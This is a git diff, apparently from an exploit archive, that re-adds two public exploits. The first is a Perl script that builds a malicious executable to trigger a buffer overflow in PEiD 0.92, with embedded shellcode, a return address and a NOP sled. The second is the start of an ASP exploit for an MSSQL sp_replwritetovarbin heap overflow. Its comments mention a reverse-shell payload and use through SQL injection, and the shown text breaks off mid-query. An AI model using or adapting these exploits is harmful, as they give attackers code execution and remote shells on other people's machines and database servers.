-"\x5B\xC3\x8B\x44\x24\x04\x0F\xAF\x44\x24\x08\x50\x6A\x08\xFF\x15\x14\x20\x40\x00\x50\xFF\x15\x00\x20\x40\x00\xC3\x00\x00\x00\x00". -"\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00". -"\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\x90\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAA\x20\x00\x00". -"\x24\x20\x00\x00\x6C\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x21\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00". -"\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\xBE\x01\x4D\x65". -"\x73\x73\x61\x67\x65\x42\x6F\x78\x41"; -my $exe_part2 = -"\x00\x55\x53\x45\x52\x33\x32\x2E\x64\x6C\x6C\x00\x00\xDF\x02\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x00\x52\x01\x47\x65\x74\x53\x74". -"\x64\x48\x61\x6E\x64\x6C\x65\x00\x00\x7D\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x02\x03\x6C\x73\x74\x72\x63\x70\x79". -"\x41\x00\x00\x99\x01\x48\x65\x61\x70\x41\x6C\x6C\x6F\x63\x00\x40\x01\x47\x65\x74\x50\x72\x6F\x63\x65\x73\x73\x48\x65\x61\x70\x00". -"\x00\x08\x03\x6C\x73\x74\x72\x6C\x65\x6E\x41\x00\x00\xCA\x00\x47\x65\x74\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E\x65\x41\x00\x4B". -"\x45\x52\x4E\x45\x4C\x33\x32\x2E\x64\x6C\x6C\x00\x00\xAE\x02\x77\x76\x73\x70\x72\x69\x6E\x74\x66\x41\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48". -"\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x00\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; -my $len = 564 - (length($shellcode) + 100); -my $overflow1 = "\x41" x 100; -my $overflow2 = "\x41" x $len; -my $overflow3 = "\x90" x 3; -my $eip = "\xa2\x33\x46\x00";#00463379 > FFE4 JMP ESP or 004633A2 . FFE4 JMP ESP -my $long_jmp = "\xe9\x0b\xfe\xff\xff"; -my $nopsled = "\x90" x 20; - -open(my $exe, "> s.eXe"); -binmode $exe; -print $exe $exe_part1.$overflow1.$shellcode.$overflow2.$long_jmp.$overflow3.$eip.$long_jmp.$nopsled.$shellcode.$overflow2.$exe_part2; -close($exe); - -# milw0rm.com [2008-12-05] +#!/usr/bin/perl +# +# PEiD <= 0.92 Buffer Overflow Universal Exploit +# Exploit by SkD (skdrat@hotmail.com) +# ---------------------------------------------- +# An old vulnerability but no existing exploit +# for it, so here it is. Of course, I had to make it +# universal because of that.This exploit will work +# on all OS versions (XP, Vista, 2003, 2000). +# You have limited space for the shellcode +# (around 500, it can be tweaked for more space) +# and there are no character restrictions. +# +# You can download PEiD 0.92 here: +# http://www.absolutelock.de/construction/files/releases/PEiD.zip +# +# To trigger the exploit, load the created executable and then +# click the "First Bytes" arrow. +# Check it out :). +# +# Note: +# Author has no responsibility over the damage you do with this. 
+ +use strict; use warnings; + +# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com +my $shellcode = +"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19". +"\xc5\xd8\x59\x83\xeb\xfc\xe2\xf4\xe5\x2d\x9c\x59\x19\xc5\x53\x1c". +"\x25\x4e\xa4\x5c\x61\xc4\x37\xd2\x56\xdd\x53\x06\x39\xc4\x33\x10". +"\x92\xf1\x53\x58\xf7\xf4\x18\xc0\xb5\x41\x18\x2d\x1e\x04\x12\x54". +"\x18\x07\x33\xad\x22\x91\xfc\x5d\x6c\x20\x53\x06\x3d\xc4\x33\x3f". +"\x92\xc9\x93\xd2\x46\xd9\xd9\xb2\x92\xd9\x53\x58\xf2\x4c\x84\x7d". +"\x1d\x06\xe9\x99\x7d\x4e\x98\x69\x9c\x05\xa0\x55\x92\x85\xd4\xd2". +"\x69\xd9\x75\xd2\x71\xcd\x33\x50\x92\x45\x68\x59\x19\xc5\x53\x31". +"\x25\x9a\xe9\xaf\x79\x93\x51\xa1\x9a\x05\xa3\x09\x71\x35\x52\x5d". +"\x46\xad\x40\xa7\x93\xcb\x8f\xa6\xfe\xa6\xb9\x35\x7a\xeb\xbd\x21". +"\x7c\xc5\xd8\x59"; +my $exe_part1 = +"\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC8\x00\x00\x00". +"\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F". +"\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00". +"\xA5\x8A\x2D\xC7\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xBE\xC9\x48\x94\xE4\xEB\x43\x94\xE1\xEB\x42\x94\xEA\xEB\x43\x94". +"\x83\xF4\x50\x94\xE4\xEB\x43\x94\x09\xF4\x48\x94\xE3\xEB\x43\x94\x52\x69\x63\x68\xE1\xEB\x43\x94\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00\x86\xE1\x38\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\x0F\x01". +"\x0B\x01\x06\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x72\x10\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00". 
+"\x00\x10\x00\x00\x00\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x04\x00\x00". +"\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x30\x20\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x20\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x2E\x74\x65\x78\x74\x00\x00\x00\xFC\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x72\x64\x61\x74\x61\x00\x00\x44\x01\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2E\x64\x61\x74\x61\x00\x00\x00\x3C\x02\x00\x00\x00\x30\x00\x00". +"\x00\x02\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x6A\x00\x68\x28\x30\x40\x00\x68\x18\x30\x40\x00\x6A\x00\xFF\x15\x24\x20\x40\x00\x68\x08\x30\x40\x00\xE8\x12\x00\x00\x00\x83\xC4". +"\x04\x33\xC0\xC3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x81\xEC\x04\x04\x00\x00\x8D\x45\x0C\x56\x50\x8D\x85". +"\xFC\xFB\xFF\xFF\xFF\x75\x08\x50\xFF\x15\x28\x20\x40\x00\x8B\xF0\x8D\x45\xFC\x6A\x00\x50\x8D\x85\xFC\xFB\xFF\xFF\x56\x50\x6A\xF5". +"\xFF\x15\x08\x20\x40\x00\x50\xFF\x15\x04\x20\x40\x00\x8B\xC6\x5E\xC9\xC3\x56\xE8\x83\x00\x00\x00\x8B\xF0\xE8\x48\x00\x00\x00\x68". +"\x04\x30\x40\x00\x68\x00\x30\x40\x00\xE8\x1F\x00\x00\x00\x6A\x00\x68\x38\x30\x40\x00\x56\xE8\x65\xFF\xFF\xFF\x83\xC4\x14\x8B\xF0". +"\xE8\x3A\x00\x00\x00\x56\xFF\x15\x0C\x20\x40\x00\x5E\x56\x8B\x74\x24\x08\x3B\x74\x24\x0C\x73\x0D\x8B\x06\x85\xC0\x74\x02\xFF\xD0". 
+"\x83\xC6\x04\xEB\xED\x5E\xC3\x6A\x20\x58\x6A\x04\x50\xA3\x30\x30\x40\x00\xE8\x0B\x01\x00\x00\x59\xA3\x2C\x30\x40\x00\x59\xC3\x8B". +"\x0D\x34\x30\x40\x00\x85\xC9\x74\x11\xA1\x2C\x30\x40\x00\x8D\x0C\x88\x51\x50\xE8\xB5\xFF\xFF\xFF\x59\x59\xC3\x53\x56\x33\xDB\x57". +"\x89\x1D\x38\x30\x40\x00\xFF\x15\x1C\x20\x40\x00\x8B\xF8\x57\xFF\x15\x18\x20\x40\x00\x40\x50\x53\xFF\x15\x14\x20\x40\x00\x50\xFF". +"\x15\x00\x20\x40\x00\x8B\xF0\x3B\xF3\x75\x07\x33\xC0\xE9\xAC\x00\x00\x00\x57\x56\xFF\x15\x10\x20\x40\x00\x80\x3E\x22\x75\x1A\x46". +"\x89\x35\x38\x30\x40\x00\x8A\x06\x3A\xC3\x74\x07\x3C\x22\x74\x03\x46\xEB\xF3\x38\x1E\x75\x1D\xEB\xD2\x89\x35\x38\x30\x40\x00\x8A". +"\x06\x3A\xC3\x74\x0B\x3C\x20\x74\x07\x3C\x09\x74\x03\x46\xEB\xEF\x38\x1E\x74\x03\x88\x1E\x46\x6A\x01\xB9\x3C\x30\x40\x00\x58\x8A". +"\x16\x3A\xD3\x74\x05\x80\xFA\x20\x74\x05\x80\xFA\x09\x75\x03\x46\xEB\xED\x8A\x16\x3A\xD3\x74\x46\x80\xFA\x22\x75\x17\x46\x40\x89". +"\x31\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3\x74\x23\x80\xFA\x22\x74\x1E\x46\xEB\xF2\x89\x31\x40\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3". +"\x74\x0D\x80\xFA\x20\x74\x08\x80\xFA\x09\x74\x03\x46\xEB\xED\x38\x1E\x74\x0B\x88\x1E\x46\x81\xF9\x38\x32\x40\x00\x7C\xA1\x5F\x5E". +"\x5B\xC3\x8B\x44\x24\x04\x0F\xAF\x44\x24\x08\x50\x6A\x08\xFF\x15\x14\x20\x40\x00\x50\xFF\x15\x00\x20\x40\x00\xC3\x00\x00\x00\x00". +"\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00". +"\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\x90\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAA\x20\x00\x00". +"\x24\x20\x00\x00\x6C\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x21\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00". +"\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\xBE\x01\x4D\x65". 
+"\x73\x73\x61\x67\x65\x42\x6F\x78\x41"; +my $exe_part2 = +"\x00\x55\x53\x45\x52\x33\x32\x2E\x64\x6C\x6C\x00\x00\xDF\x02\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x00\x52\x01\x47\x65\x74\x53\x74". +"\x64\x48\x61\x6E\x64\x6C\x65\x00\x00\x7D\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x02\x03\x6C\x73\x74\x72\x63\x70\x79". +"\x41\x00\x00\x99\x01\x48\x65\x61\x70\x41\x6C\x6C\x6F\x63\x00\x40\x01\x47\x65\x74\x50\x72\x6F\x63\x65\x73\x73\x48\x65\x61\x70\x00". +"\x00\x08\x03\x6C\x73\x74\x72\x6C\x65\x6E\x41\x00\x00\xCA\x00\x47\x65\x74\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E\x65\x41\x00\x4B". +"\x45\x52\x4E\x45\x4C\x33\x32\x2E\x64\x6C\x6C\x00\x00\xAE\x02\x77\x76\x73\x70\x72\x69\x6E\x74\x66\x41\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48". +"\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x00\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; +my $len = 564 - (length($shellcode) + 100); +my $overflow1 = "\x41" x 100; +my $overflow2 = "\x41" x $len; +my $overflow3 = "\x90" x 3; +my $eip = "\xa2\x33\x46\x00";#00463379 > FFE4 JMP ESP or 004633A2 . 
FFE4 JMP ESP
+my $long_jmp = "\xe9\x0b\xfe\xff\xff";
+my $nopsled = "\x90" x 20;
+
+open(my $exe, "> s.eXe");
+binmode $exe;
+print $exe $exe_part1.$overflow1.$shellcode.$overflow2.$long_jmp.$overflow3.$eip.$long_jmp.$nopsled.$shellcode.$overflow2.$exe_part2;
+close($exe);
+
+# milw0rm.com [2008-12-05]
diff --git a/platforms/windows/local/7501.asp b/platforms/windows/local/7501.asp
index c6fec7324..f0f197288 100755
--- a/platforms/windows/local/7501.asp
+++ b/platforms/windows/local/7501.asp
@@ -1,246 +1,246 @@ -<html> -<% -// k`sOSe 12/17/2008 -// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow -// Tested on Win2k SP4 with MSSQL 2000(on one box only!). -// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445), -// the change allows multiple shots :) -// -// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff. - -// Take a look at the comments in T-SQL - - - -On Error Resume Next - -// change this -UserName = "r00t" -Password = "t00r" - -// ########################################### FIRST QUERY -SQL = "DECLARE @buf NVARCHAR(4000), "&_ -"@val NVARCHAR(4), "&_ -"@counter INT "&_ -"SET @buf = ' "&_ -"declare @retcode int, "&_ -"@end_offset int, "&_ -"@vb_buffer varbinary, "&_ -"@vb_bufferlen int "&_ -"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ -"SET @val = CHAR(0x41) "&_ -"SET @counter = 0 "&_ -"WHILE @counter < 3020 "&_ -"BEGIN "&_ -" SET @counter = @counter + 1 "&_ -" IF @counter = 2900 "&_ -" BEGIN "&_ -" SET @val = CHAR(0x43) "&_ -" END "&_ -" ELSE IF @counter = 299 "&_ -" BEGIN "&_ -" SET @val = CHAR(0x42) "&_ -" END "&_ -" ELSE IF @counter = 300 "&_ -" BEGIN "&_ - - -" /* First byte overwritten here. 
This is a random writable address */ "&_ -" SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ -" CONTINUE "&_ -" END "&_ -" SET @buf = @buf + @val "&_ -"END "&_ -"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_ -"EXEC master..sp_executesql @buf" - - - - - -// ########################################### SECOND QUERY -SQL2 = "DECLARE @buf NVARCHAR(4000), "&_ -"@val NVARCHAR(4), "&_ -"@counter INT "&_ -"SET @buf = ' "&_ -"declare @retcode int, "&_ -"@end_offset int, "&_ -"@vb_buffer varbinary, "&_ -"@vb_bufferlen int "&_ -"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ -"SET @val = CHAR(0x41) "&_ -"SET @counter = 0 "&_ -"WHILE @counter < 3097 "&_ -"BEGIN "&_ -" SET @counter = @counter + 1 "&_ -" IF @counter = 2900 "&_ -" BEGIN "&_ -" SET @val = CHAR(0x43) "&_ -" END "&_ -" ELSE IF @counter = 299 "&_ -" BEGIN "&_ -" SET @val = CHAR(0x42) "&_ -" END "&_ -" ELSE IF @counter = 300 "&_ -" BEGIN "&_ - - -" /* Second byte overwritten here */ "&_ -" SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ -" CONTINUE "&_ -" END "&_ -" SET @buf = @buf + @val "&_ -"END "&_ -"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_ -"EXEC master..sp_executesql @buf" - - - - - -// ########################################### THIRD QUERY -SQL3 = "DECLARE @buf NVARCHAR(4000), "&_ -"@val NVARCHAR(4), "&_ -"@counter INT "&_ -"SET @buf = ' "&_ -"declare @retcode int, "&_ -"@end_offset int, "&_ -"@vb_buffer varbinary, "&_ -"@vb_bufferlen int "&_ -"exec 